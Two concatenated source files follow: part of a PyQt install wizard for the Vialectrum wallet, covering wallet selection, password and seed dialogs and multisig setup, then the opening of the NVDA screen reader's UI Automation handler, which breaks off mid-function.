wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Vialectrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/vialectrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Vialectrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Vialectrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Vialectrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
_UIAHandler.py
|
#_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2019 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
from collections import namedtuple
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
goodUIAWindowClassNames=[
# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
'RAIL_WINDOW',
]
badUIAWindowClassNames=[
"SysTreeView32",
"WuDuiListView",
"ComboBox",
"msctls_progress32",
"Edit",
"CommonPlacesWrapperWndClass",
"SysMonthCal32",
"SUPERGRID", #Outlook 2010 message list
"RichEdit",
"RichEdit20",
"RICHEDIT50W",
"SysListView32",
"EXCEL7",
"Button",
# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
# It does not implement caret/selection, and probably has no new text events.
"ConsoleWindowClass",
# #8944: The Foxit UIA implementation is incomplete and should not be used for now.
"FoxitDocWnd",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
"#32770",
"NUIDialog",
"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
"Shell_Dialog",
"Shell_Flyout",
"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
NVDAUnitsToUIAUnits={
"character":TextUnit_Character,
"word":TextUnit_Word,
"line":TextUnit_Line,
"paragraph":TextUnit_Paragraph,
"readingChunk":TextUnit_Line,
}
UIAControlTypesToNVDARoles={
UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
UIA_ListControlTypeId:controlTypes.ROLE_LIST,
UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
UIAPropertyIdsToNVDAEventNames={
UIA_NamePropertyId:"nameChange",
UIA_HelpTextPropertyId:"descriptionChange",
UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
UIA_ToggleToggleStatePropertyId:"stateChange",
UIA_IsEnabledPropertyId:"stateChange",
UIA_ValueValuePropertyId:"valueChange",
UIA_RangeValueValuePropertyId:"valueChange",
UIA_ControllerForPropertyId:"UIA_controllerFor",
UIA_ItemStatusPropertyId:"UIA_itemStatus",
}
UIAEventIdsToNVDAEventNames={
UIA_LiveRegionChangedEventId:"liveRegionChange",
#UIA_Text_TextChangedEventId:"textChanged",
UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
UIA_MenuOpenedEventId:"gainFocus",
UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
#UIA_MenuModeEndEventId:"menuModeEnd",
#UIA_Text_TextSelectionChangedEventId:"caret",
UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
#UIA_ToolTipClosedEventId:"hide",
UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
UIA_SystemAlertEventId:"UIA_systemAlert",
}
class UIAHandler(COMObject):
_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
def __init__(self):
super(UIAHandler,self).__init__()
self.MTAThreadInitEvent=threading.Event()
self.MTAThreadStopEvent=threading.Event()
self.MTAThreadInitException=None
self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
self.MTAThread.daemon=True
self.MTAThread.start()
self.MTAThreadInitEvent.wait(2)
if self.MTAThreadInitException:
raise self.MTAThreadInitException
def terminate(self):
MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
self.MTAThreadStopEvent.set()
#Wait for the MTA thread to die (while still message pumping)
if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
windll.kernel32.CloseHandle(MTAThreadHandle)
del self.MTAThread
def MTAThreadFunc(self):
try:
oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
isUIA8=False
try:
self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
isUIA8=True
except (COMError,WindowsError,NameError):
self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
# #7345: Instruct UIA to never map MSAA winEvents to UIA propertyChange events.
# These events are not needed by NVDA, and they can cause the UI Automation client library to become unresponsive if an application firing winEvents has a slow message pump.
pfm=self.clientObject.proxyFactoryMapping
for index in xrange(pfm.count):
e=pfm.getEntry(index)
for propertyID in UIAPropertyIdsToNVDAEventNames.keys():
# Check if this proxy has mapped any winEvents to the UIA propertyChange event for this property ID
try:
oldWinEvents=e.getWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID)
except IndexError:
# comtypes does not seem to correctly handle a returned empty SAFEARRAY, raising IndexError
oldWinEvents=None
if oldWinEvents:
# As winEvents were mapped, replace them with an empty list
e.setWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID,[])
# Changes to an enty are not automatically picked up.
# Therefore remove the entry and re-insert it.
pfm.removeEntry(index)
pfm.insertEntry(index,e)
if isUIA8:
# #8009: use appropriate interface based on highest supported interface.
# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
for interface in reversed(CUIAutomation8._com_interfaces_):
try:
self.clientObject=self.clientObject.QueryInterface(interface)
break
except COMError:
pass
# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
# Enable all of these where available.
if isinstance(self.clientObject,IUIAutomation6):
self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
self.windowCacheRequest=self.clientObject.CreateCacheRequest()
self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
self.UIAWindowHandleCache={}
self.baseTreeWalker=self.clientObject.RawViewWalker
self.baseCacheRequest=self.windowCacheRequest.Clone()
import UIAHandler
self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
self.baseCacheRequest.addProperty(propertyId)
self.baseCacheRequest.addPattern(UIA_TextPatternId)
self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
for x in UIAEventIdsToNVDAEventNames.iterkeys():
self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
if isinstance(self.clientObject, IUIAutomation5):
self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
except Exception as e:
self.MTAThreadInitException=e
finally:
self.MTAThreadInitEvent.set()
self.MTAThreadStopEvent.wait()
self.clientObject.RemoveAllEventHandlers()
def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
# We don't need the menuOpened event if focus has been fired,
# as focus should be more correct.
return
NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if (
not obj
or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
):
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
# The last UIAElement that received a UIA focus event
# This is updated no matter if this is a native element, the window is UIA blacklisted by NVDA, or the element is proxied from MSAA
lastFocusedUIAElement=None
def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
self.lastFocusedUIAElement=sender
if not self.isNativeUIAElement(sender):
return
import NVDAObjects.UIA
if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
# Ignore duplicate focus events.
# It seems that it is possible for compareElements to return True, even though the objects are different.
# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
return
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj or not obj.shouldAllowUIAFocusEvent:
return
eventHandler.queueEvent("gainFocus",obj)
def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
# We also don't use the value in this callback.
newValue.vt=VT_EMPTY
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
# There is nothing we can do with these.
return
eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
def _isUIAWindowHelper(self,hwnd):
# UIA in NVDA's process freezes in Windows 7 and below
processID=winUser.getWindowThreadProcessID(hwnd)[0]
if windll.kernel32.GetCurrentProcessId()==processID:
return False
import NVDAObjects.window
windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
# For certain window classes, we always want to use UIA.
if windowClass in goodUIAWindowClassNames:
return True
# allow the appModule for the window to also choose if this window is good
# An appModule should be able to override bad UIA class names as prescribed by core
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
if appModule and appModule.isGoodUIAWindow(hwnd):
return True
# There are certain window classes that just had bad UIA implementations
if windowClass in badUIAWindowClassNames:
return False
# allow the appModule for the window to also choose if this window is bad
if appModule and appModule.isBadUIAWindow(hwnd):
return False
# Ask the window if it supports UIA natively
res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
if res:
# the window does support UIA natively, but
# MS Word documents now have a fairly usable UI Automation implementation. However,
# Builds of MS Office 2016 before build 9000 or so had bugs which we cannot work around.
# And even current builds of Office 2016 are still missing enough info from UIA that it is still impossible to switch to UIA completely.
